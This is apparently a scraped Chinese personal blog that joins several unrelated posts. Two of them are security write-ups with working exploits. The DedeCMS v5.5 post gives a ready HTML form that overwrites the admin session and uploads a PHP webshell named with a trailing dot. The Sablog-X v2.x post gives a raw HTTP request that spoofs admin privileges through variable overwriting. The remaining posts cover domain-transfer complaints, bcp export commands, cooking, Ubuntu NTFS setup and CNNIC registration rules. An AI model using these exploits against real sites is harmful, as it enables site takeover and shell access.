今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:http://bbs.wolvez.org/topic/125/

自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..

而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..

我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...

看了一下/include/dialog/select_soft_post.php

问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

......
//文件名（前为手工指定， 后者自动处理）
if(!empty($newname))
{
	$filename = $newname; //当我们的新名称为st0p.php.的时候
	if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); //当$filename中不含有.的时候调用
	else $fs = explode('.', $filename); //当$filename中含有.时调用
	if(eregi($cfg_not_allowall, $fs[count($fs)-1])) //$fs[count($fs)-1]得到的值为空,跳过验证
	{
		ShowMsg("你指定的文件名被系统禁止！",'javascript:;');
		exit();
	}
	if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}
else
{
	$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
	$fs = explode('.', $uploadfile_name);
	if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
	{
		ShowMsg("你上传了某些可能存在不安全因素的文件，系统拒绝操作！",'javascript:;');
		exit();
	}
	$filename = $filename.'.'.$fs[count($fs)-1];
}
$fullfilename = $cfg_basedir.$activepath.'/'.$filename; //嘿嘿,跳过验证,$filename还为st0p.php.
$fullfileurl = $activepath.'/'.$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败！");
@unlink($uploadfile);
......

EXP如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
    var form = document.forms[0];
    form.action = form.target.value + form.path.value;
    tmpstr = form.target.value +'/'+ form.newname.value;
    form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
    form.submit();
    }
</script>
<style type="text/css">
<!--
body {
	text-align: center;
}
-->
</style>
</head>
 
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<form action="" method="post" enctype="multipart/form-data">
  <p>
    <input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
    <input type="hidden" name="bkurl" value="1" />
    <label>Target:
      <input name="target" type="text" id="target" value="http://target" />
    </label>
    <label>Path:
      <input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" />
    </label>
    <label>File:
      <input type="file" name="uploadfile" id="uploadfile" />
    </label>
    <label>NewName:
      <input name="newname" type="text" id="newname" value="shell.php." />
    </label>
    &nbsp;<input type="submit" name="button" id="button" value="Fuck" onclick="fsubmit()" />
  </p>
</form>
</body>
</html>

您可能对以下文章有兴趣↓

• Sablog-X v2.x 任意变量覆盖漏洞
• DEDECMS 小说连载模块 0DAY
• DVBBS php2.0 注入漏洞
• Linux内核高危漏洞,一个命令直接提权
• DEDECMS XDAY
• ewebeditor v6.0.0版本漏洞
• dedecms 5.3的不足之处,加一鸡肋小漏!
• joekoe CMS 4.0 两个漏洞(上传漏洞+注入)
• ECSHOP商城系统过滤不严导致SQL注入漏洞
• 动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞

根本不需要什么身份证明,乱七八糟证明的,你只需确认whois信息里admin的邮箱是你所有的,就OK.

一下内容都建立在这个前提下,否则出现其他后果,自负!

最好用的办法就是到InterNIC 递交你的投诉,地址http://reports.internic.net/cgi/registrars/problem-report.cgi

在这里你只需要填写一下个人信息,还有下面的单选框,选右下角那一个.

Transfer Problems -
Auth Codes
Locked Domain
Fraudulent Transfer
Registrar Denied Transfer

作为消费者的我们一定要勇于维护自己的权益，而不是忍气吞声，这样子只会助纣为虐，让坏人更加嚣张。对于中国的某些域名注册商和代理们我也不用多说了，如果你曾经在转移域名的问题受到过他们的刁难，请一定要到上面这个地址去投诉下他们。

万网:HICHINA ZHICHENG TECHNOLOGY LTD.

新网互联:BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN

新网信海:XIN NET TECHNOLOGY CORPORATION

PS:新网信海还算是不错的,我给代理发了邮件,3工作日后,就收到域名转移码了.所以说注册域名找个好代理也很重要.

范文1
Hello,I regesiter xxxx.com and xxxx.com from HICHINA ZHICHENG TECHNOLOGY LTD.
I am not satisfied with their services.And I want to transfer my domains to name.com.
From April 20th,2009,I have do everything as they tell me to do.I have send my goverment ID card copy to them.
And I have given a lot of phones to them.Everytime they say I will receive my auth code soon.But everytime I login in my email-”xxxx@xxxx.com”,I still couldn’t receive the auth codes.
They limited the user transfer the domain particularly seriously.I have waste about one mothes but I still can’t receive my auth code.
Today they want me to wait for 60 days and continu to begin the transfer again.
They don’t give me the auth codes to transfer the domain.Please!Please!Do please help me tarnsfer my domain.HICHINA is a very bad domain registrar.

范文2
This is a Domain Name Complaint letter about HiChina Registrar I send 3nd times. I’m the domain owner of xxxxxx, wanna transfer domains registrar from HiChina (HiChina Zhicheng Technology Limited, www.net.cn) to GoDaddy.com, Inc.

But after I submit information include photocopy of id card & passport and comfirm they recieved (by telephone). HICHINA refuse to processed the transfer, the reason is the application form is not completely. Actually I submit 2 times to meet their request.

First time: Around 23rd, Dec 2008 I sent application form and photocopy of my ID card. They replay me that there is a reqest item i left empty and no signature;

Second time: Around 8th, Feb 2009 I sent application form with signature and completely all item attached photocopy of my passport (by HiChina’s request). But they still refuse with same reason. I don’t know how can I do to meet the request.

I feel that is irresponsible action and it break the iccan domain policy for nosense reason. I need your help.

范文3
To Iccan administrator:
Dear ICCAN administrator,happy new year.
This is a Domain Name Complaint letter about Changing Registrars,I’m the domain owner, wanna tranfer some domain Registrar from HICHINA WEB SOLUTIONS (HONG KONG) LIMITED to enom
(xxx.com，xx.net，xx.com，xx.com，xxxx.com…)
But after i submit ems info to them and confirm they receving(by email and telephone),HICHINA refuse to proceed the process and then have no response.
I feel that’s irresponsible action and it break the iccan domain Policy for nonsense reason.I need your help.
my agent id:xxx,name xxx,thanks a lot.
server info:
Domain Name: xxx
Registrar: HICHINA WEB SOLUTIONS (HONG KONG) LIMITED
Whois Server: grs.hichina.com
Referral URL: http://whois.hichina.com

您可能对以下文章有兴趣↓

• 新网DNS服务器被黑客攻击
• lixiaopeng.org申请转入GODADDY了
• 难道有人要买我的lixiaopeng.org域名？

1
2

bcp "select * from info..info where date between '2010-02-01' and
'2010-02-04'" queryout "d:\info.out" -SST0P-PC\SQLEXPRESS -Usa -P123456 -c

直接导出数据库表的数据

1

bcp 库名.dbo.表名 out d:\表名.dat -T -n

其中-S后的ST0P-PC\SQLEXPRESS是我本地的服务器名称
-U后的是用户名
-p后的是密码

输入bcp/?查看帮助

用法: bcp {dbtable | query} {in | out | queryout | format} 数据文件
[-m 最大错误数] [-f 格式化文件] [-e 错误文件]
[-F 首行] [-L 末行] [-b 批大小]
[-n 本机类型] [-c 字符类型] [-w 宽字符类型]
[-N 将非文本保持为本机类型] [-V 文件格式版本] [-q 带引号的标识符]
[-C 代码页说明符] [-t 字段终止符] [-r 行终止符]
[-i 输入文件] [-o 输出文件] [-a 数据包大小]
[-S 服务器名称] [-U 用户名] [-P 密码]
[-T 可信连接] [-v 版本] [-R 允许使用区域设置]
[-k 保留空值] [-E 保留标识值]
[-h"加载提示"] [-x 生成 xml 格式化文件]

您可能对以下文章有兴趣↓

• [转]mssql的sa权限执行命令方法总结
• MSSQL注入通杀，只要有注入点就有系统权限
• 对mssql注射中union获取数据的一些研究

一 描叙：

由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。

二 分析

common.inc.php代码里：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
	@extract($_COOKIE, EXTR_SKIP);
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
...
	if ($_EVO = $DB->fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。
...
}
if(!$sessionexists) {
	if($sax_uid) {
		if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
...
@extract($_EVO); //覆盖任意变量

由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)

三 利用

下面给个后台权限欺骗的PoC:

1
2
3
4
5
6
7
8
9
10
11

POST http://127.0.0.1/sax/cp.php  HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close
 
_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=111111111111

四 补丁[fix]

缺

您可能对以下文章有兴趣↓

• DEDECMS v5.5 Final select_soft_post.php 漏洞
• DVBBS php2.0 注入漏洞
• Linux内核高危漏洞,一个命令直接提权
• ewebeditor v6.0.0版本漏洞
• joekoe CMS 4.0 两个漏洞(上传漏洞+注入)
• ECSHOP商城系统过滤不严导致SQL注入漏洞
• 动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞
• 网趣网上购物系统时尚版 v3.2注入漏洞
• 不要小看注释掉的JS
• apache浏览目录漏洞

您可能对以下文章有兴趣↓

• No Related Post

上面这两张是刚炒出来鸡块的时候，很麻辣哦。然后接着加工，加了香菜，蘑菇，木耳，大豆芽，芹菜芽，豆腐叶，芝麻，辣椒。。。边吃边加热，麻辣鲜香，红红的汤，红红的辣椒，绿色的香菜，黄色的大豆芽，黑色的木耳，白色的蘑菇，芝麻，豆腐叶，嘎，还有金黄色的肉。。。好吃啊！

您可能对以下文章有兴趣↓

• No Related Post

您可能对以下文章有兴趣↓

• No Related Post

您可能对以下文章有兴趣↓

• No Related Post

sudo apt-get install ntfs-config

sudo ntfs-config

您可能对以下文章有兴趣↓

• Ubuntu常用软件,配置和命令

FUCK,让人郁闷的消息,看来我转移到GODADDY是个正确的选择...

　　12月9日晚间，中央电视台《焦点访谈》就手机网络色情进行了系列访谈，晚间节目主题为《失控的域名》，指责工信部CNNIC对于域名的注册缺乏监管，域名注册服务过程中存在注册信息不真实、不准确、不完整的问题，要求其保证域名注册信息的真实性，严格执行实名制审查，并承担相应责任。

　　在遭到央视点名批评后，中国域名监管机构CNNIC处罚了三家域名注册服务及代理机构，并在官方网站接连发出数则加强域名注册信息审核工作的公告，而最新公告规定，从2009年12月14日上午9时起，个人用户没有资格进行域名注册。

　　该公告要求用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。个人用户由于无法提供企业营业执照或组织机构代码证，因此也没有资格进行域名注册。这也意味着，个人用户在未来将无法在国内注册包括COM、NET、CN等在内的所有域名。

　　对于个人网站用户来说，我以前就说过不要在国内注册域名，现在是彻底无法在国内注册了，中国的域名注册服务辛辛苦苦发展了十多年，现在一夜回到解放前，在广电的强势进攻之下，工信部可谓一败涂地，现在连个人用户都无法在国内进行域名注册了，互联网的发展历史性的倒退了。

　　这样的要求除了让个人网站更难注册域名之外，还减少CNNIC自身的业务，可谓损人不利己。现在已经不是十年前了，各大银行的个人信用卡业务已经茁壮发展起来了，只要申请一张国际信用卡，就可以轻松在国外网站进行域名注册，注册填写的信息更加难以监管和监控，CNNIC还失去了对这些域名的控制权。

　　因此，现在还在使用国内域名注册服务的个人网站，应该充分认识到这方面存在的巨大不确定风险，尽快将域名转到国外，例如美国的注册商。美国是法制国家，域名注册商绝对不会出卖客户的隐私信息的，也不会违规取消客户的域名。因此，在美国注册域名安全、可靠、实惠，总的来说远远优于在国内域名注册服务。具体操作可参见这篇“万网域名转出攻略”。

　　新注册的个人网站用户，由于国内已经不允许个人注册域名，因此只能在国外注册，注册可参见我这篇“在国外进行国际域名注册”的攻略。

　　没有信用卡的用户，可以寻找一些代购服务，让有信用卡的用户代购，也可以做一些国外的广告，将收入接收到自己的PayPal帐号，然后使用PayPal支付域名费用。

　　附：CNNIC关于进一步加强域名注册信息审核工作的公告

　　为了提升域名注册信息的真实性、准确性、完整性，进一步加强域名注册信息审核工作，现通知如下要求：

　　1、用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。

　　2、域名注册服务机构应当认真审核用户提交的书面申请材料，审核合格后，将书面申请材料通过传真或电子邮件的形式提交至我中心，并保留书面申请资料。

　　3、自域名提交在线申请之日起5日内我中心未收到书面申请材料的或域名申请材料审核不符合条件的，该域名将予以注销。

　　4、以上要求自2009年12月14日上午9时起施行。

　　中国互联网络信息中心　　2009年12月11日

您可能对以下文章有兴趣↓

• Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录
• 关掉Godaddy自动续费
• 域名lixiaopeng.org成功转入Godaddy
• lixiaopeng.org申请转入GODADDY了